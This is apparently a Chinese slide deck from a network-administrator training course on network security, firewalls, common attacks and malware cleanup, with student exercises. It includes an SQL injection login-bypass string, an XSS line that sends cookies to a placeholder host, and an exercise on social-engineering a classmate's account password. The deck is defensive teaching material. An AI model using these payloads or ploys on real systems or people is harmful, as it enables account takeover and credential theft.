網(wǎng)管寒訓(xùn)網(wǎng)路安全與病毒防護(hù)

喇賽時間為什麼要談資訊安全?近來發(fā)生的問題今日作業(yè)2021/4/211網(wǎng)路安全2021/4/212網(wǎng)路安全基本介紹網(wǎng)路安全的基本需求網(wǎng)路面臨的問題網(wǎng)路的安全威脅2021/4/213網(wǎng)路安全的基本需求傳輸?shù)谋Ｃ苄?confidentiality)資料的完整性(integrity)身分的鑑別與認(rèn)證(authentication)雙方的不可否認(rèn)性(nonrepudiation)2021/4/214網(wǎng)路面臨的問題病毒蠕蟲攻擊網(wǎng)路癱瘓垃圾郵件機(jī)密外洩非法入侵即時通訊(MSN….)back2021/4/215網(wǎng)路的安全威脅系統(tǒng)、漏洞不斷被發(fā)現(xiàn)，攻擊手法不斷翻新更新的速度永遠(yuǎn)比不過感染的速度病毒變種快速攻擊程式及後門程式氾濫廣告郵件、垃圾訊息及色情網(wǎng)站充斥整個網(wǎng)路非法下載即時通訊2021/4/216隨堂練習(xí)請從網(wǎng)路找出一個近年來的網(wǎng)路攻擊事件的新聞，並簡單判別它是以上提到的哪種問題?2021/4/217提高網(wǎng)路連線的安全性資料加密(DataEncryption)

明文(plaintext)密文(ciphertext)認(rèn)證(Authorization)

通常是要求使用者輸入帳號密碼權(quán)限設(shè)定(Authentication)稽核(Auditing)

提供過去事件的相關(guān)紀(jì)錄利於事後追蹤

2021/4/218典型密碼系統(tǒng)發(fā)送方接收方加密演算法解密演算法加密金鑰解密金鑰明文密文明文2021/4/219網(wǎng)路安全設(shè)備入侵防禦系統(tǒng)(IPS&IDS)防火牆（Firewall)防毒系統(tǒng)(Anti-Virus)2021/4/2110Firewall安裝在兩個網(wǎng)路間的裝置藉著過濾掉某些不可靠的資料封包來增加系統(tǒng)的安全性提供稽核與控制存取等服務(wù)2021/4/2111Firewall的基本功能認(rèn)證(UA,UserAuthentication)預(yù)警功能(Alert)記錄與記錄分析工具(Log&LogAnalyzer)通訊埠的權(quán)限設(shè)定2021/4/2112Firewall的缺點(diǎn)易形成網(wǎng)路上的交通瓶頸無法防止內(nèi)部網(wǎng)路的使用者用其合法的身分做破壞系統(tǒng)的行為不一定能阻止開後門無法有效阻止有心人士利用原作業(yè)系統(tǒng)的漏洞進(jìn)行入侵破壞行為不提供資料完整性驗(yàn)證2021/4/2113三大Firewall類型1.封包過濾式2.應(yīng)用層閘道式3.電路層閘道式2021/4/2114封包過濾式防火牆應(yīng)用於網(wǎng)路層針對每個封包的標(biāo)頭提供的資訊加以查核優(yōu)點(diǎn)：1.完全通透性2.速度快缺點(diǎn)：1.無法有效防止IP欺騙2.有些應(yīng)用協(xié)議不適用(EX.HTTP)2021/4/2115隨堂練習(xí)1.請去網(wǎng)路上找出另外兩種防火牆的簡介，並列出兩種防火牆的優(yōu)缺點(diǎn)2.請完成以下表格封包過濾式應(yīng)用層閘道式電路層閘道式運(yùn)作層級運(yùn)作效率通透性安全性建置價格2021/4/2116防火牆Comodo個人防火牆personalfirewallodoMcAfeePersonalFirewall2021/4/2117入侵偵測系統(tǒng)IDS架設(shè)在網(wǎng)路節(jié)點(diǎn)與主機(jī)間的針孔攝影機(jī)若防火牆是第一道防線IDS就是第二道防線可以監(jiān)控用戶和系統(tǒng)的所有活動將封包拆開分析再重新組合2021/4/2118隨堂練習(xí)使用IDS是否真的萬無一失?請查閱網(wǎng)路資料並列出IDS的缺點(diǎn)2021/4/2119防毒軟體以特徵碼和行為模式辨別病毒、木馬並不能100%阻擋病毒的入侵(因?yàn)椴《咀兎N過於快速)不怕一萬，只怕萬一定期更新病毒碼、主程式2021/4/2120網(wǎng)路的基本運(yùn)作原理Internet世界

TCP/IP協(xié)定WindowsPort80Port110Port25Port??…2021/4/2121Port的角色與功能電腦進(jìn)出Internet的大門一般來說，每個網(wǎng)路軟體都可以打開任一個Port，但為了傳輸順暢，某些軟體就會固定使用某幾個Port所以沒用到、不常用的幾個Port就容易成為駭客入侵最常使用的Port2021/4/2122隨堂練習(xí)請找出以下幾個程式或協(xié)定所使用的Port1.FTP6.HTTP2.Telnet7.DHCP3.SMTP4.POP35.網(wǎng)路芳鄰2021/4/2123駭客入侵2021/4/2124駭客入侵的對象Server個人!!!2021/4/2125常見的攻擊手法(Server)猜密碼利用系統(tǒng)的程式漏洞『主動』攻擊利用程式功能的『被動』攻擊rootkit→蠕蟲或木馬社交工程DoS(DenialofService)XSS(Cross-SiteScripting)2021/4/2126猜密碼取得帳號資訊後猜密碼

常見帳號admin,administrator,webmaster…Bruteforce(暴力法)

利用字典檔進(jìn)行無數(shù)次試驗(yàn)2021/4/2127猜密碼初級cracker會使用的方式之一WINRARpasswordrecovery費(fèi)時防護(hù)：1.建立較嚴(yán)格的密碼設(shè)定規(guī)則2.密碼輸入次數(shù)限制

back

2021/4/2128利用系統(tǒng)的程式漏洞『主動』攻擊軟體撰寫方式的問題

bug(可能會造成系統(tǒng)的不穩(wěn)定或當(dāng)機(jī))

Security(程式碼撰寫方式會導(dǎo)致系統(tǒng)的使用權(quán)限被惡意者所掌握)cracker會嘗試撰寫一些針對這個漏洞的攻擊程式→攻擊者只要拿到攻擊程式就可以進(jìn)行攻擊

SQLinjection

2021/4/2129SQLinjection(資料隱碼)利用使用者輸入的東西來控制你的SQLExample:select*frommemberwhereUID='

"&request("ID")&"

'

AndPasswd='"&request("Pwd")&"‘正常：select*frommemberwhereUID='A123456789'

AndPasswd='1234‘2021/4/2130SQLinjection

使用者帳號’or1=1--，密碼隨便打結(jié)果：select*frommemberwhereUID=''or1=1--'

AndPasswd='asdf1234'邏輯成立跳過驗(yàn)證密碼過程(p.s.--符號後的任何敘述都會被當(dāng)作註解

)2021/4/2131隨堂練習(xí)請運(yùn)用剛剛所提到的內(nèi)容寫出一段資料隱碼攻擊的程式碼2021/4/2132利用系統(tǒng)的程式漏洞『主動』攻擊最常見不需要猜密碼由攻擊開始到取得你系統(tǒng)的root權(quán)限不需要兩分鐘，就能夠立刻入侵成功防護(hù)：1.關(guān)閉不需要的網(wǎng)路服務(wù)&Port2.隨時保持更新

back2021/4/2133利用程式功能的『被動』攻擊惡意網(wǎng)站提供軟體下載與安裝瀏覽器主動的答應(yīng)對方WWW主機(jī)所提供的各項(xiàng)程式功能，或者是自動安裝來自對方主機(jī)的軟體瀏覽器漏洞讓對方得以傳送惡意程式碼給你的主機(jī)來執(zhí)行

ActiveX主動式內(nèi)容(IEcore)：

EX.讀寫檔案、病毒掃瞄等

但是有讓對方網(wǎng)站控制本機(jī)的危險(xiǎn)

2021/4/2134利用程式功能的『被動』攻擊防護(hù)：1.隨時更新2.讓瀏覽器在安裝軟體時，要通過你的確認(rèn)後才安裝3.不要連上惡意網(wǎng)站

(難!!)

back2021/4/2135rootkit→蠕蟲或木馬蠕蟲(Worm)惡性程式碼感染整個網(wǎng)路木馬間諜程式(Trojan)附著在可執(zhí)行檔案裡開後門爽(側(cè)錄、跳板、破壞….)Rootkit即為取得root權(quán)限的工具包途徑：漏洞與社交工程…..等2021/4/2136社交工程(SocialEngineering)簡介過人與人的互動來達(dá)到『入侵』的目的偽裝、謊言時間可能長以年計(jì)釣魚法推薦書目：藍(lán)色駭客(出版社：皇冠文化)

MSNphoto系列病毒2021/4/2137社交工程(SocialEngineering)防護(hù)：1.帳號密碼記在腦子裡不要說2.不要隨便相信他人(?)3.追蹤對談?wù)遙ack2021/4/2138隨堂練習(xí)情境題：如果你是一個駭客，你會怎樣利用社交工程來騙取現(xiàn)在坐在你旁邊同學(xué)的郵局帳號密碼?(請用50~100字簡單敘述流程)2021/4/2139DoS(DenialofService)阻斷式攻擊SYN：當(dāng)主機(jī)接收了一個帶有SYN的TCP封包之後，就會啟用對方要求的port來等待連線SYNflood：透過軟體功能，在短短的時間內(nèi)持續(xù)發(fā)送出SYN封包，Server就會持續(xù)不斷的發(fā)送確認(rèn)封包，並且開啟大量的port在空等CPU使用率飆高、頻寬被吃光掰機(jī)關(guān)槍打坦克2021/4/2140補(bǔ)充:三方交握(Three-WayHandshaking)Client端發(fā)出連線要求時，必須要提供下列資訊：

Client自己的IP位址所使用的Port號最大容許的TCPSegment大小其他訊息三方交握：1.Clioent想要與Server連線，因此Host1將SYN旗標(biāo)設(shè)定為1，同時將目前的Segment序號(x)傳送給Host2。

2.Server接收到此要求後，會對此連線要求加以回應(yīng)，因此將SYN設(shè)定為1，此外附上目前序號(y)，及確認(rèn)序號(x+1)給Client。（在此，確認(rèn)號碼為發(fā)送端序號加一）。3.Client收到此訊號後，會將序號設(shè)定為(x+1)，然後確認(rèn)序號設(shè)定為(y+1)。（確認(rèn)序號仍為對方的序號加一）。2021/4/21412021/4/21422021/4/2143DDoS(DistributedDenialofService)進(jìn)化版集合眾人之力先散播惡意軟體(透過後門等方式)同步所有攻擊程式，於同時間朝同目標(biāo)攻擊效率為DoS的數(shù)倍單純惡意行為(不是為了取得root)目前無較好方法防堵2021/4/2144back2021/4/2145Cross-SiteScripting(XSS)跨站腳本攻擊十大攻擊之首利用網(wǎng)站上允許使用者輸入字元或字串的欄位插入HTML與Script語言

利用釣魚式攻擊

將使用者的cookie資料導(dǎo)入到駭客網(wǎng)站並儲存

無名小站(2006)2021/4/2146Cross-SiteScripting(XSS)EX.<script>location.replace('xxx/?secret='+document.cookie)</script>防護(hù)1.BlackList缺點(diǎn)：過濾不乾淨(jìng)2.WhiteList缺點(diǎn)：Client變化性少2021/4/2147隨堂練習(xí)請從網(wǎng)路上找出一種阻斷式攻擊的方法(講義上沒提到的)2021/4/2148病毒與木馬防護(hù)2021/4/2149木馬??2021/4/2150木馬病毒傻傻分不清楚病毒─進(jìn)入電腦中進(jìn)行軟硬體的損壞、無法操作等破壞行為木馬─進(jìn)入電腦中蒐集各種資訊，甚至完全控制寄主2021/4/2151木馬的功用遠(yuǎn)端遙控轉(zhuǎn)向入侵(or跳板)截取封包獲得帳號密碼DDoS2021/4/2152木馬怎麼防?最佳方式─不要讓它植入你的電腦不幸中了怎麼辦?1.想辦法清除2.利用之前的備份重灌2021/4/2153簡易中毒自救法1.先拔網(wǎng)路線2.使用防毒軟體檢察3.檢查開機(jī)自動執(zhí)行與系統(tǒng)服務(wù)4.檢查已執(zhí)行的程式5.查看Port連線情況6.上網(wǎng)求救---------------------------------------------------------------進(jìn)階：監(jiān)控封包2021/4/2154使用防毒軟體檢察平時就要定期更新病毒碼防毒軟體只是疫苗，不一定是解藥

p.s.Spybot–Search&Destroy2021/4/2155檢查開機(jī)自動執(zhí)行1.啟動資料夾2021/4/2156檢查開機(jī)自動執(zhí)行2.Win.ini或是System.ini在Windows的資料夾裡Win.ini通常不會有任何的run和load參數(shù)System.ini裡的shell參數(shù)的Explorer.exe不會有別的程式名稱2021/4/2157檢查開機(jī)自動執(zhí)行3.檢察機(jī)碼(Registry)執(zhí)行regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce通常只有系統(tǒng)運(yùn)行所需之程式或是自己灌的應(yīng)用程式Startupmlin/files/StartupCPL.zip2021/4/2158HKEY_USERS\S-1-5-21-..........\Software\Microsoft\WindowNT\CurrentVersion\Windows裡面通常沒有run的機(jī)碼HKEY_LOCAL_Machine\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon裡面的Shell機(jī)碼值應(yīng)該只有explorer.exe2021/4/2159檢察系統(tǒng)服務(wù)控制臺系統(tǒng)服務(wù)停用可疑或自己不認(rèn)識的服務(wù)2021/4/2160檢查已執(zhí)行的程式工作管理員TaskInfo(共享軟體)可以上網(wǎng)查不知道是什麼的程式neuber/taskmanager/process/index.htmlprocesslibrary/directory/一些WinXP的系統(tǒng)程式：

smss.exelsass.execsrss.exewinlogon.exeExplore.exeregsvc.exesvchost.exe(會有很多個)進(jìn)入安全模式將可疑執(zhí)行檔刪除2021/4/2161查看Port狀況CurrPortnirsoft/utils/cports.html將可疑程式的位置鎖定後刪除2021/4/2162隨堂作業(yè)請去網(wǎng)路上找出以下幾個程式的發(fā)行公司及用途alg.exemplayerc.exeWinMgmt.exewmiprvse.exeInternat.exedaemon.exepdesk.exe2021/4/2163上網(wǎng)求救各大防毒公司網(wǎng)頁pttAntiVirus板2021/4/2164隨身碟病毒利用隨身碟插入時，電腦自動執(zhí)行的功能執(zhí)行木馬安裝程式變種異常迅速防護(hù)：關(guān)閉自動執(zhí)行改用檔案總管開啟隨身碟WowUSBProtector/~ant/wordpress/?p=10082021/4/2165隨堂練習(xí)請查出關(guān)閉自動執(zhí)行的機(jī)碼2021/4/2166結(jié)論網(wǎng)路很可怕做好防護(hù)措施快樂上網(wǎng)2021/4/2167作好系統(tǒng)帳號安全管理系統(tǒng)的第一道防線密碼就像牙刷-天天要用，而且要常常換拒用weakpassword2021/4/2168系統(tǒng)安全漏洞防護(hù)留意來自網(wǎng)路上及軟體廠商的系統(tǒng)安全漏洞報(bào)告定期Windowsupdate(自動執(zhí)行)應(yīng)用程式版本更新2021/4/2169安裝安全防護(hù)程式防毒防火牆定期更新病毒碼及掃描port掃描2021/